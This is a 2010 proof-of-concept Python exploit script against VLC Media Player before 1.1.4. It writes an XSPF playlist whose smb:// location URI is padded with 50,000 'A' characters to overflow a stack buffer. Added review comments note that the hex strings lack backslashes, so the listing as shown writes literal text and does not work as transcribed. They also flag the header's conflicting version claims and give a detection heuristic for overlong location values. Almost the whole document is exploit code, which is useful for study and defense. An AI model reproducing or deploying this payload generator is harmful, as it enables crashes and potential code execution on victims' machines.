
# Title : VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Published : 2010-09-04
# Author : hadji samir


#!/usr/bin/python
#
# Exploit Title:	VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Date:			 04-09-2010
# Author:		Hadji Samir   , s-Dz[at]hotmail[dot]fr
# Software Link:	http://sourceforge.net/projects/vlc/files/1.1.4/win32/vlc-1.1.4-win32.exe/download?use_mirror=garr
# Version:		VLC Media Player < 1.1.4
# Tested on:	Windows XP sp2 with VLC 1.1.4 
# CVE :
# Notes:		Samir tjrs mahboul-3lik ...
#			 
###############################################################################################################		
  

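# Builds a malformed XSPF playlist and writes it to the current directory.
# The playlist holds a single <track> whose <location> is an smb:// URI padded
# with a filler token repeated 50000 times; according to the header of this
# file, handling that URI overflows a stack buffer in the affected VLC builds.
#
# NOTE(review): in this copy the string literals contain no backslashes, so
# Python treats "x3Cx3F..." as plain text rather than as the bytes the hex
# digits spell out. The decoded forms quoted in the comments below describe
# what the hex pairs represent, not what this listing writes as-is.
#
# NOTE(review): the header gives the affected range as "< 1.1.4" but also says
# "Tested on ... VLC 1.1.4", and its CVE field is blank. Confirm the fixed
# release against the vendor advisory before relying on a version check.
#
# Defensive takeaway: the trigger is the length of the smb:// URI inside
# <location>, so an XSPF file whose location value runs to tens of kilobytes
# is worth flagging or rejecting before it reaches a media player.

# Playlist prologue. The hex pairs spell the XML declaration, the <playlist>
# root with its two namespace attributes, <title>Playlist</title>, and the
# opening <trackList><track><location> followed by
# "smb://example.com@www.example.com/#{".
data1 = (
    "x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31"
    "x2Ex30x22x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x55x54"
    "x46x2Dx38x22x3Fx3Ex0Dx0Ax3Cx70x6Cx61x79x6Cx69x73"
    "x74x20x76x65x72x73x69x6Fx6Ex3Dx22x31x22x20x78x6D"
    "x6Cx6Ex73x3Dx22x68x74x74x70x3Ax2Fx2Fx77x77x77x2E"
    "x65x78x65x6Dx70x6Cx65x2Ex6Fx72x67x2Fx22x20x78x6D"
    "x6Cx6Ex73x3Ax76x6Cx63x3Dx22x68x74x74x70x3Ax2Fx2F"
    "x77x77x77x2Ex65x78x65x6Dx70x6Cx65x2Ex6Fx72x67x2F"
    "x22x3Ex0Dx0Ax09x3Cx74x69x74x6Cx65x3Ex50x6Cx61x79"
    "x6Cx69x73x74x3Cx2Fx74x69x74x6Cx65x3Ex0Dx0Ax09x3C"
    "x74x72x61x63x6Bx4Cx69x73x74x3Ex0Dx0Ax09x09x3Cx74"
    "x72x61x63x6Bx3Ex0Dx0Ax09x09x09x3Cx6Cx6Fx63x61x74"
    "x69x6Fx6Ex3Ex73x6Dx62x3Ax2Fx2Fx65x78x61x6Dx70x6C"
    "x65x2Ex63x6Fx6Dx40x77x77x77x2Ex65x78x61x6Dx70x6C"
    "x65x2Ex63x6Fx6Dx2Fx23x7B")

# Filler placed inside the "#{...}" part of the URI. 0x41 is ASCII "A"; the
# payload carries no structure beyond its length.
buff = ("x41" * 50000)

# Playlist epilogue. The hex pairs spell "}</location>", a VLC <extension>
# element containing <vlc:id>0</vlc:id>, and the closing </track>,
# </trackList> and </playlist> tags.
data2 = (
    "x7Dx3Cx2Fx6Cx6Fx63x61x74x69x6Fx6Ex3E"
    "x3Cx65x78x74x65x6Ex73x69x6Fx6Ex20x61x70x70x6Cx69"
    "x63x61x74x69x6Fx6Ex3Dx22x68x74x74x70x3Ax2Fx2Fx77"
    "x77x77x2Ex76x69x64x65x6Fx6Cx61x6Ex2Ex6Fx72x67x2F"
    "x76x6Cx63x2Fx70x6Cx61x79x6Cx69x73x74x2Fx30x22x3E"
    "x0Dx0Ax09x09x09x09x3Cx76x6Cx63x3Ax69x64x3Ex30x3C"
    "x2Fx76x6Cx63x3Ax69x64x3Ex0Dx0Ax09x09x09x3Cx2Fx65"
    "x78x74x65x6Ex73x69x6Fx6Ex3Ex0Dx0Ax09x09x3Cx2Fx74"
    "x72x61x63x6Bx3Ex0Dx0Ax09x3Cx2Fx74x72x61x63x6Bx4C"
    "x69x73x74x3Ex0Dx0Ax3Cx2Fx70x6Cx61x79x6Cx69x73x74"
    "x3Ex0Dx0Ax0Dx0A")

# Write prologue + filler + epilogue as one file. The context manager closes
# the handle even if the write raises, which the original open()/close() pair
# did not guarantee.
with open("Mahboul-3lik.xspf", "w") as wizz:
    wizz.write(data1 + buff + data2)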